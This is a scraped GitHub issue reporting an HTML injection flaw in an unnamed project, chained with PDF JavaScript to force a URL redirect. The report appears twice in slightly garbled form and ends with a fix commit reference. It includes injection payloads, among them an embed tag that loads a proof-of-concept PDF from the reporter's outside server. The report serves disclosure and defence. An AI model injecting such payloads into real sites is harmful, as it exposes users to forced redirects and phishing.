We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable.
<h1 style="color=red">xxx</h1>
Fix the vulnerability: please use html entity encode
because of embed tags are not restricted by the same-origin policy, so we could upload my poc pdf file to our vps, and inject following code: payload:<embed width="100%" height="100%" name="plugin" id="plugin"> src="https://www.0u0.ooo/output.pdf" type="application/pdf" internalinstanceid="5"> result: 1 img 2 img
<embed width="100%" height="100%" name="plugin" id="plugin">
The text was updated successfully, but these errors were encountered:
fix & update cc #127,#125
32d4d5e
No branches or pull requests
In the latest version, exist HTML injection, Combined with pdf javascript excute, lead to url redirect vulnerable.
[HTML injection] (https://i.loli.net/2018/11/15/5bec54988cbe0.png)
payload :
Fix the vulnerability: please use html entity encode
poc:https://www.0u0.ooo/output.pdf
because of embed tags are not restricted by the same-origin policy, so we could upload my poc pdf file to our vps, and inject following code:
payload:
<embed width="100%" height="100%" name="plugin" id="plugin">
src="https://www.0u0.ooo/output.pdf" type="application/pdf" internalinstanceid="5">result:
1 img
2 img
The text was updated successfully, but these errors were encountered: